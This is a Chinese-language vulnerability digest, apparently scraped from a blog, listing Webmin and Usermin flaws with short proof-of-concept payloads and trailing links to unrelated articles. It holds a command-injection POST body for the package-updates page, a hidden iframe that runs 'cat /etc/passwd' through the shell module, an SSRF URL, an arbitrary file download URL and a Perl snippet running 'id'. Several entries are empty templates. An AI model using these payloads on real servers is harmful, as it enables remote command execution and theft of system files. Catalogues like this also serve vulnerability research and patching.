简介

开发语言

PHP

用途
系统管理

CVE-2019-15642

Date
2019.7

类型
远程代码执行

影响范围
Webmin <= 1.920

复现
POC|EXP
OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd='id'; print "$cmd\n\n";

分析

反序列化导致远程代码执行

CVE-2019-15107

Date



类型

远程代码执行

影响范围

Webmin <= 1.920

前置条件
/password_change.cgi可访问

复现
POC | EXP


分析

CVE-2019-12840

Date

2019.6

类型

远程代码执行

影响范围

v 1.910

复现
POC|EXP
(1)
POST: https://url/package-updates/update.cgi 
Data: mode=updates&search=&u=apt/apt&u=;${command};/apt&ok_top=Update+Selected+Packages
mode=updates&search=&u=apt/apt&u=;echo ”124“ > asd.txt;%2Fapt&ok=Update+Selected+Packages
(2)
POST: https://url/package-updates/update.cgi 
Data: mode=new&search=&u=;${command};/apt&ok_top=Update+Selected+Packages


分析

XSS vulnerability that leads to Remote Code Execution

Date



类型

XSS导致远程代码执行

影响范围

Webmin version 1.850

前置条件
/at/create_job.cgi可访问
 

CSRF

Date



类型

CSRF

影响范围

Webmin version 1.850

SSRF

Date



类型

SSRF

影响范围

Webmin version 1.850

复现
POC|EXP
https://xx.org:8443/tunnel/link.cgi/https://baidu.com

HTML Email Command Execution Vulnerability

Date

类型

远程命令执行



影响范围
Usermin versions <= 1.080


复现

POC|EXP

<iframe src='/shell/index.cgi?cmd=cat+%2Fetc%2Fpasswd&pwd=%2Fhome%2Fv

ictim&history=' height=0 width=0></iframe>

任意文件下载

Date



类型

任意文件下载

影响范围

DansGuardian Webmin Module DansGuardian Webmin Module 0.5.8
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.6
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.5
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.3
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.2
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.1
DansGuardian Webmin Module DansGuardian Webmin Module 0.4.2
DansGuardian Webmin Module DansGuardian Webmin Module 0.4.1
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.7 a
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.7
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.6
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.5 a
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.5
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.4
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.3
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.2
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.1
DansGuardian Webmin Module DansGuardian Webmin Module 0.2.1
DansGuardian Webmin Module DansGuardian Webmin Module 0.2 .0

前置条件

/dansguardian/edit.cgi 可访问

复现

POC|EXP
https://www.xx.com:10000/dansguardian/edit.cgi?file=[FILE]

应用安全 - 工具 | 平台 -webmin - 漏洞 - 汇总的更多相关文章

  1. 应用安全 - 工具 | 平台 - Weblogic - 漏洞 - 汇总

    控制台路径 | 弱口令  前置条件 /console CVE-2016-0638  Date 类型远程代码执行 影响范围10.3.6, 12.1.2, 12.1.3, 12.2.1  CVE-2016 ...

  2. 应用安全 - 工具 | 平台 - gitlist - 漏洞 - 汇总

    简介 用途 Github仓库查看器 CVE-2014-4511 Date 类型 远程代码执行 影响范围 gitlist 0.4.0及之前版本

  3. 应用安全 - 平台 | 工具 - Centreon Web - 漏洞 - 汇总

    简介 产地 法国 用途 监控 分布 CVE-2019-16405 https://thecybergeek.co.uk/cves/2019/09/19/CVEs.html

  4. 应用安全 - 工具 | 数据库 - redis - 漏洞 - 汇总

    未授权访问 Date 类型 未授权访问导致getshell 影响范围 复现 (1)shell反弹 (2)结合SSH服务 (3)结合web服务 分析

  5. 应用安全 - 软件漏洞 - 可视化平台kibana漏洞汇总

    CVE-2019-7609  Date: 类型: RCE 前置条件: Timelion And Canvas 影响范围: kibana-RCE < PoC | ExP: https://gith ...

  6. ETH&EOS开发资源及工具集合(完整汇总版)

    ETH&EOS开发资源及工具集合(完整汇总版) 3113 ETH开发资源篇 一.开发语言 ·         Solidity - 官方推荐以太坊智能合约开发语言,也是目前最为主流的智能合约语 ...

  7. Android开发之《常用工具及文档汇总》

    GreenVPN:https://www.getgreenjsq.com/ Android开发工具.资料下载汇总:http://androiddevtools.cn/#img-size-handle- ...

  8. 【转】使用kettle工具遇到的问题汇总及解决方案

    使用kettle工具遇到的问题汇总及解决方案   转载文章版权声明:本文转载,原作者薄海 ,原文网址链接 http://blog.csdn.net/bohai0409/article/details/ ...

  9. 【架构】技术-工具-平台-语言&框架

    技术-工具-平台-语言&框架 Techniques | Technology Radar | ThoughtWorks

随机推荐

  1. LVS+Heartbeat安装部署文档

    LVS+Heartbeat安装部署文档 发表回复 所需软件: ipvsadm-1.24-10.x86_64.rpmheartbeat-2.1.3-3.el5.centos.x86_64.rpmhear ...

  2. qt5--鼠标操作

    #include "mylabel.h" #include <QDebug> #include <QPointF> #include <QPoint& ...

  3. 【leetcode】1233. Remove Sub-Folders from the Filesystem

    题目如下: Given a list of folders, remove all sub-folders in those folders and return in any order the f ...

  4. Python 操作 MySQL 数据库Ⅲ

    数据库查询操作 Python查询Mysql使用 fetchone() 方法获取单条数据, 使用fetchall() 方法获取多条数据. fetchone(): 该方法获取下一个查询结果集.结果集是一个 ...

  5. 数组 slice方法和splice方法的区别

    一.slice() 方法 slice()方法可以从已有的数组中返回选定的元素. 语法: arrayObject.slice(start,end) 参数: start:(截取开始位置的索引,包含开始索引 ...

  6. springboot整合admin管理平台

    server 端 <parent> <groupId>org.springframework.boot</groupId> <artifactId>sp ...

  7. ie文件断点续传

    一.概述 所谓断点续传,其实只是指下载,也就是要从文件已经下载的地方开始继续下载.在以前版本的HTTP协议是不支持断点的,HTTP/1.1开始就支持了.一般断点下载时才用到Range和Content- ...

  8. C语言写数据库(二)

    简单的实现增删查改的操作后,实现了一个先读写其中一个表的某两项内容,再把相关字符段写入到另外一张表中去.涉及到查询和插入两个步骤. 其中还涉及到汉字的读写和插入,会有字符的操作产生乱码.所以要先保证m ...

  9. 八、定制new和delete

    条款49:了解new-handler的行为 new异常会发生什么事? 在旧式的编译器中,operator new分配内存失败的时候,会返回一个null指针.而现在则是会抛出一个异常. 而在抛出这个异常 ...

  10. unittest详解(二) 跳过用例的执行(skip)

    在执行测试用例时,有时候有些用例是不需要执行的,那我们怎么办呢?难道删除这些用例?那下次执行时如果又需要执行这些用例时,又把它补回来?这样操作就太麻烦了. unittest提供了一些跳过指定用例的方法 ...